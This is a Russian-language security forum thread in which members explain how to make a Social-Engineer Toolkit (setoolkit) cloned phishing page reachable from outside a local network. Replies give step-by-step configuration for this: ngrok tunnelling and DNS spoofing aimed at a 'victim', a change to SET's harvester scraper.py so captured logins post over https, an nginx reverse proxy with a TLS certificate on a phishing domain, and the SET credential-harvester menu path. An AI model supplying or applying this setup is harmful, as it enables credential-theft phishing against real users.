• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

setoolkit фишинг страница работает только внутри сети wifi

sol37

New member
01.11.2020
1
0
BIT
0
Здравствуйте! Есть проблема с отображением страницы клона. Внутри сети wifi отображается корректно. Если стучаться на ip где лежит копия вне сети, то просто идет загрузка до ошибки по тайму ожидания. Есть подозрения что проблема кроется во внешнем и внутреннем ip. Есть мыслишки? (новичок, чем проще тем лучше.)
Как сделать что бы страница отображалась вне сети?
пробовал на разных сайтах, начиная от гигантов и заканчивая простыми "мамкиными" страницами.
 

Abaz Abaza

Member
31.12.2019
10
0
BIT
0
Предупреждение за нецензурную лексику
Прив. Сам бьюсь над этой проблем ... 3 суток .. лет 5 назод это работало без особой плояски ... но теперь стало работать только на уровне локальной скти .. технологии летят.. ) ну думаю х**ня .. лезу в код допиливаю прикучиваю ngrok.. пару файерволов с фильтрацицие по mac адресу и ip обхожу, т.д. в результате в методе с шаблоном стриница становится доступта жертве, но при вводе в не логина и пароля спрашивает ., типа не безапосно, вы уверены... и если наживаеш да типа еверен, то ни чего не происходит... страница виснет ... и все .. ну думаю, ладно.. лезу в код , играюь обработчиками скриптов прикрученныеми к кнопкам авторизации, ибо прин нажатиии все равно все запросы пойдут через червера гугла... и ни чего не помогает,.. делаю прокси, играюсь с подменной dns... на аналоге ngrok , но там более гибкая система кот орая позволяет и порты назначать и dns менять, и тунель нудак приходит и логи трафика всего собираютсяЮ но хуй в рот ...в инет и на любых форомах несут ахинею..
 
Последнее редактирование модератором:

M0r7iF3r

Green Team
01.09.2020
105
2
BIT
319
Когда разворачивал кампанию с setoolkit, поднимал сервак на nginx, прикручивал DNS, https и устанавливал в опциях прокси на SET
Код:
location /set/ {
    proxy_pass http://127.0.0.1:3000/;
}
Правда еще немного в коде правил, чтобы редирект был корректным на https, вместо http.
 

Abaz Abaza

Member
31.12.2019
10
0
BIT
0
Когда разворачивал кампанию с setoolkit, поднимал сервак на nginx, прикручивал DNS, https и устанавливал в опциях прокси на SET
Код:
location /set/ {
    proxy_pass http://127.0.0.1:3000/;
}
Правда еще немного в коде правил, чтобы редирект был корректным на https, вместо http.
а это интересно ... можно поподробнее .какую нить силку или мануал, или поподробнее личный опыт ?
 

M0r7iF3r

Green Team
01.09.2020
105
2
BIT
319
а это интересно ... можно поподробнее .какую нить силку или мануал, или поподробнее личный опыт ?
Личный опыт.
В файле /etc/setoolkit/set.config устанавливал опцию
Код:
WEB_PORT=3000
В файле /src/webattack/harvester/scraper.py немного редактировал
Код:
В строке
'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
 Меняю http на https
'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
В nginx добавлял конфиг на свой сервер
Код:
server {
    listen              *:443 ssl;
    server_name         domain.xyz;
    ssl_certificate     /etc/letsencrypt/live/domain.xyz/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/domain.xyz/privkey.pem;
    ssl_protocols       TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers         HIGH:!aNULL:!MD5;
    # Path for Social-Engeeniring-Toolkit
    location            /set/ {
                            proxy_pass http://127.0.0.1:3000/;
    }
...
В настройках SET
Код:
1 -> 2 -> 3 -> 2 -> Внешний IP с nginx -> Клoнируемый URL

З.Ы. Вообще я поднимал на сервере амазона, но и внутрь локалки это не проблема, если на роутере все настроено, просто мы указываем IP роутера
Код:
set:webattack> IP address for the POST back in Harvester/Tabnabbing
[192.168.1.10]: <Белый IP>

З.З.Ы. По-моему я еще в файле hosts прописывал и белый и внутренний IP на фишинговый домен, давно это было.
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!